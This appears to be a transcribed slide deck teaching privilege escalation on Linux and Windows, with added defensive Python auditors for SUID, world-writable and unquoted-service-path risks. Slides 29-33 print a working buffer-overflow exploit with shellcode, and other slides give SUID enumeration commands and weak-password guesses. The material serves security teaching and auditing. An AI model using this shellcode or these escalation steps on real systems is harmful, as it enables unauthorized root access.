3. # “Privilege Escalation”
Pre-Exploitation -> Exploitation -> Post-Exploitation
Pre-Exploitation: Information gathering, Scanning, Enumeration
Exploitation:
Remote Exploitation
- Gain system access
- Gain information
- Denial of service
- Privilege Escalation
Local Exploitation
- Bypass Restriction
- Privilege Escalation
Post-Exploitation: Gathering Sensitive Info, Manage System/Service, Pivoting
4. # “Privilege Escalation”
Windows: NT AUTHORITY\System > Administrators > Power Users > Users / Service Users
Unix: Root > Sudoer > Users / Service Users
5. # “Privilege Escalation”
• Vertical privilege escalation -> gain higher privilege (e.g. user john -> root)
• Horizontal privilege escalation -> gain access with other accounts at the same level (e.g. user john -> service users apache, mysql)
6. # “Privilege Escalation”
[Diagram: Windows tiers NT AUTHORITY\System > Administrators > Power Users > Users / Service Users; paths labelled Anonymous FTP, Webshell, LocalExploit, Vul. Service Exp]
7. # “Privilege Escalation”
[Diagram: same Windows tiers; paths labelled Unauthorized Access, LocalExploit, Users]
8. # “Privilege Escalation”
[Diagram: same as slide 7]
16. # “Privilege Escalation” Ways for Linux
• Remote exploit of a vulnerable service running as a high-privilege user
• Weak passwords of high-privilege users
• Credentials stored in files with weak permissions
• Configuration and log files
• History
• Env, $PATH
• Shell escape (restricted shell, chroot)
• Vulnerable applications / programs / services running as high-privilege users
• Weak permissions on job/task files run by high-privilege users
• Sudoer
• System misconfiguration
• Kernel exploitation
• Remote exploitation via localhost
17. # “Privilege Escalation” Ways for Linux
• Remote exploit of a vulnerable service running as a high-privilege user
18. # “Privilege Escalation” Ways for Linux
• Remote exploit of a vulnerable service running as a high-privilege user
FILE_SERVER
# ps -ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
19. # “Privilege Escalation” Ways for Linux
• Weak passwords of high-privilege users
Maybe the password is similar to the username, or a common weak password is used, e.g. root / Password / P@ssw0rd / ….
20. # “Privilege Escalation” Ways for Linux
• Credentials stored in files with weak permissions
• Configuration and log files
• History
• Env, $PATH
22. # “Privilege Escalation” Ways for Linux
• Restricted shell escape
https://netsec.ws/?p=337
https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
23. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
• Characteristics of a vulnerable program
• Owned by “root” as user or group
• Has the SUID or SGID bit set
• Has an overflow bug
• Uses a static libc (nice to have)
24. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
• Characteristics of a vulnerable program
• Owned by “root” as user or group
• Has the SUID or SGID bit set
list="$(find / -perm -4000 -o -perm -2000 2>/dev/null)"; for i in $list; do ls -al "$i"; done
ls -lR / 2>/dev/null | grep "wsr" | grep "root"
25. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
26. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
• Characteristics of a vulnerable program
• Has an overflow bug
27. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
Check the buffer overflow position
28. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
Check the buffer overflow position
29. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
# objdump -d vul_app | grep "jmp" | grep "esp"
# ROPgadget --binary vul_app --only "jmp" | grep esp
0x08049f0f : jmp %esp
30. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
Shellcode: system(“/bin//sh”)
Shellcode =
“\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80”
[Diagram: the saved return address is overwritten with 0x08049f0f (jmp %esp), so execution continues at esp, where the shellcode sits]
31. # “Privilege Escalation” Ways for Linux
# python -c 'print "A"*612 + "\x0f\x49\x04\x08" +
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
Privilege is dropped (the spawned /bin/sh does not keep the setuid effective UID)
32. # “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
# nano /tmp/sh.c
33. # “Privilege Escalation” Ways for Linux
# python -c 'print "A"*612 + "\x0f\x49\x04\x08" +
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x74\x6d\x70\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
(the “/bin” bytes \x2F\x62\x69\x6E are replaced by \x2F\x74\x6d\x70 = “/tmp”, so the shellcode runs /tmp//sh)
• Vulnerable applications / programs / services running as high-privilege users
35. # “Privilege Escalation” Ways for Linux
Real life is not that easy!!!!
• Canary (buffer overflow detection)
• Executable stack prevention (NX, DEP)
• Address Space Layout Randomization (ASLR)
36. # “Privilege Escalation” Ways for Linux
But it’s possible to bypass!!!
• Canary (buffer overflow detection) -> Canary Repair
• Executable stack prevention (NX, DEP) -> Ret-2-Libc, ROP
• Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up
https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-82b1d063aa6b&v=&b=&from_search=1
37. # “Privilege Escalation” Ways for Linux
• Weak permissions on job/task files run by high-privilege users
/etc/cron.d
/etc/crontab
/etc/cron.hourly
/etc/cron.daily
/etc/cron.weekly
/etc/cron.monthly
# ls -Ral /etc/cron*
38. # “Privilege Escalation” Ways for Linux
• Weak permissions on job/task files run by high-privilege users
Reverse shell
39. # “Privilege Escalation” Ways for Linux
• Weak permissions on job/task files run by high-privilege users
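Defensive counterpart to the two file-permission checks in this deck (the SUID/SGID search on slide 24 and the cron-directory listing on slide 37), written as an added example for this page rather than code from the deck; it assumes only the Python standard library and builds its own constructed sample tree so it can be tried without root:

```python
import os
import stat
import tempfile


def classify(path):
    """Return the risk labels that apply to one path (empty list if none)."""
    try:
        st = os.lstat(path)   # lstat: judge the entry itself, not a link target
    except OSError:
        return []
    mode, labels = st.st_mode, []
    if stat.S_ISLNK(mode):
        return []
    if mode & stat.S_ISUID:
        labels.append("setuid")          # slide 24: find / -perm -4000
    if mode & stat.S_ISGID:
        labels.append("setgid")          # slide 24: find / -perm -2000
    # World-writable entries; sticky directories such as /tmp are expected.
    if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
        labels.append("world-writable")  # slide 37: ls -Ral /etc/cron*
    return labels


def audit_tree(root):
    """Walk root without following symlinks; return sorted [(path, label), ...].
    On a live host: audit_tree("/") for setuid/setgid, audit_tree("/etc") for cron files."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            findings.extend((path, label) for label in classify(path))
    return sorted(findings)


def make_sample_tree():
    """Constructed fixture, not a real host: a temp tree with one setuid
    helper, one world-writable job file and one harmless file."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    for name, mode in (("suid-helper", 0o4755), ("cron-job", 0o666), ("ok", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("# constructed sample file\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for path, label in audit_tree(make_sample_tree()):
        print(f"{label:15} {path}")
```

Anything reported on a real host that is not a known, package-installed setuid binary or an intentionally shared file deserves a closer look.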
45. # “Privilege Escalation” Ways for Linux
• Kernel exploitation (trick)
Ex: Linux version 2.6.9-89.EL
• Compile the exploit on the target system or in a target-like environment
• Metasploitable is a good environment for compiling exploits
46. # “Privilege Escalation” Ways for Linux
# ps -ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
• Remote exploitation via localhost (127.0.0.1)
47. # “Privilege Escalation” Ways for Linux
• [Linux Privilege Escalation Scripts and Commands]
Ref: https://netsec.ws/?p=309
LinEnum: http://www.rebootuser.com/?p=1758
LinuxPrivChecker: http://www.securitysift.com/download/linuxprivchecker.py
Basic-linux-privilege-escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
55. # “Privilege Escalation” Ways for Linux
• Case Study:
[Diagram: from a low-privilege foothold to root; labels: Other Unix Servers, Dirty Cow, Default password, Crack root pass, Bypass Restrict Shell, CMC]
56. # “Privilege Escalation” Ways for Windows
• Remote exploit of a vulnerable service running as a high-privilege user
• Weak passwords of high-privilege users
• Credentials stored in files and the Registry
• Vulnerable applications / programs / services running as high-privilege users
• Weak permissions on job/task files run by high-privilege users
• System misconfiguration
• Kernel exploitation
• Pass-the-hash
• DLL injection
• DLL hijacking
• Remote exploitation via localhost
• Hotpotato
• Many more…
57. # Remote Exploit to escalate privilege
• Exploit a vulnerable service running as a high-privilege user
58. # Remote Exploit to escalate privilege
• Exploit a vulnerable service running as a high-privilege user
Credit: Worawit Wangwarunyoo (sleepya)
59. # “Privilege Escalation” Ways for Windows
• Exploit a misconfigured service running as a high-privilege user
60. # “Privilege Escalation” Ways for Windows
• Exploit a misconfigured service running as a high-privilege user
61. # Remote Exploit to escalate privilege
• Exploit a misconfigured service running as a high-privilege user
WebShell
73. # Remote Exploit to escalate privilege
http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
Windows Server 2012
83. # “Privilege Escalation” Ways for Windows
Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
When Windows attempts to run this service, it looks at the following paths in order and runs the first EXE that it finds:
84. # “Privilege Escalation” Ways for Windows
Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
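The lookup rule quoted above, implemented as an added example (not code from the deck or the referenced blog): given a service ImagePath, it lists the executables Windows would try in order, so a defender can flag services whose paths need quoting. The service names and paths are a constructed sample, not values from a real host:

```python
# Constructed sample of service ImagePath values, in the form they appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath; not from a real host.
SAMPLE_SERVICES = {
    "UpdaterSvc": r"C:\Program Files\Acme Tools\updater\svc.exe -run",
    "QuotedSvc": r'"C:\Program Files\Acme Tools\agent.exe" --service',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}


def candidate_executables(image_path):
    """Files Windows tries, in order, for a service command line (slide 83):
    an unquoted path is cut at each space with ".exe" appended, and the first
    file that exists is run. A quoted path yields exactly one candidate."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return [s[1:end] if end > 0 else s[1:]]
    parts = s.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)       # the intended binary itself
            break
        candidates.append(prefix + ".exe")  # e.g. C:\Program.exe
    return candidates


def is_unquoted_path_risk(image_path):
    """True when more than one file could be chosen: a .exe placed earlier
    in the search order would then run with the service's privileges."""
    return len(candidate_executables(image_path)) > 1


def triage(services):
    """Map each at-risk service name to the files that would shadow its real
    binary. The fix is to quote the ImagePath and to keep those parent
    directories non-writable for standard users."""
    report = {}
    for name, path in services.items():
        if is_unquoted_path_risk(path):
            report[name] = candidate_executables(path)[:-1]
    return report


if __name__ == "__main__":
    for name, shadows in triage(SAMPLE_SERVICES).items():
        print(f"{name}: quote the ImagePath; shadow candidates {shadows}")
```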
92. # “Privilege Escalation” Ways for Windows
• DLL Hijacking
https://msitpros.com/?p=2012
The way Windows loads DLLs, then, is to search the following directories in this order:
– The directory from which the application loaded
– C:\Windows\System32
– C:\Windows\System
– C:\Windows
– The current working directory
– Directories in the system PATH environment variable
– Directories in the user PATH environment variable
https://www.gracefulsecurity.com/privesc-dll-hijacking/
93. # “Privilege Escalation” Ways for Windows
• DLL Hijacking
https://pentestlab.blog/2017/03/27/dll-hijacking/
94. # “Privilege Escalation” Ways for Windows
• DLL Hijacking
https://pentestlab.blog/2017/03/27/dll-hijacking/